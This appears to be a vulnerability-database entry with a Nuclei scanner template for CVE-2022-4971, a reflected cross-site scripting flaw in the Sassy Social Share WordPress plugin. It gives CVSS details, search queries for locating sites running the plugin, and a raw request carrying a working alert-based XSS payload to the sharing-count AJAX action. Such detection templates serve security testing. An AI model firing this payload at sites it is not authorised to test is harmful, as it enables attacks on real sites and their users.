Sassy Social Share <= 3.3.3 - Cross-Site Scripting
CVE-2022-4971
Verified
Description
The Sassy Social Share plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'urls' parameter called via the 'heateor_sss_sharing_count' AJAX action in versions up to, and including, 3.3.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
Severity
Medium
CVSS Score
6.1
Exploit Probability
10%
Affected Product
sassy_social_share
Published Date
September 8, 2025
Template Author
popcorn94
CVE-2022-4971.yaml
id: CVE-2022-4971
info:
name: Sassy Social Share <= 3.3.3 - Cross-Site Scripting
author: popcorn94
severity: medium
description: |
The Sassy Social Share plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'urls' parameter called via the 'heateor_sss_sharing_count' AJAX action in versions up to, and including, 3.3.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
impact: |
Unauthenticated attackers can inject malicious JavaScript through the urls parameter in the sharing count AJAX action, potentially stealing WordPress user sessions and performing actions on behalf of authenticated users.
remediation: |
Update Sassy Social Share plugin to a version newer than 3.3.3 that properly sanitizes the urls parameter and encodes output in the AJAX action.
reference:
- https://www.wordfence.com/threat-intel/vulnerabilities/id/85277960-2bba-4cd7-9f4c-e04f6743b96c?source=cve
- https://wpscan.com/vulnerability/4631519b-2060-43a0-b69b-b3d7ed94c705/
- https://nvd.nist.gov/vuln/detail/CVE-2022-4971
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-4971
cwe-id: CWE-79
epss-score: 0.10126
epss-percentile: 0.93291
cpe: cpe:2.3:a:heateor:sassy_social_share:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 2
vendor: heateor
product: sassy_social_share
framework: wordpress
shodan-query: http.html:"/wp-content/plugins/sassy-social-share"
fofa-query: body=/wp-content/plugins/sassy-social-share/
publicwww-query: /wp-content/plugins/sassy-social-share/
google-query: inurl:"/wp-content/plugins/sassy-social-share"
tags: wpscan,cve,cve2022,wordpress,wp-plugin,wp,sassy-social-share,xss,authenticated,vkev,vuln
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/admin-ajax.php?action=heateor_sss_sharing_count&urls[<img%20src%3dx%20onerror%3dalert(document.domain)>]= HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains_all(body_2, "facebook_urls\":", "<img src=x onerror=alert(document.domain)>")'
- 'contains(content_type_2, "text/html")'
- 'status_code_2 == 200'
condition: and
# digest: 490a00463044022054c549e1431dd6462233d47dff6d3f1605abd49bb6e9b50eb32560744d6ef7e5022057f5e8be8d4bc450490141b80047e906884613eb1e2bb46989125ed793c5a1ba:922c64590222798bb761d5b6d8e729506.1Score
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CVE ID:
cve-2022-4971
CWE ID:
cwe-79
Remediation Steps
Update Sassy Social Share plugin to a version newer than 3.3.3 that properly sanitizes the urls parameter and encodes output in the AJAX action.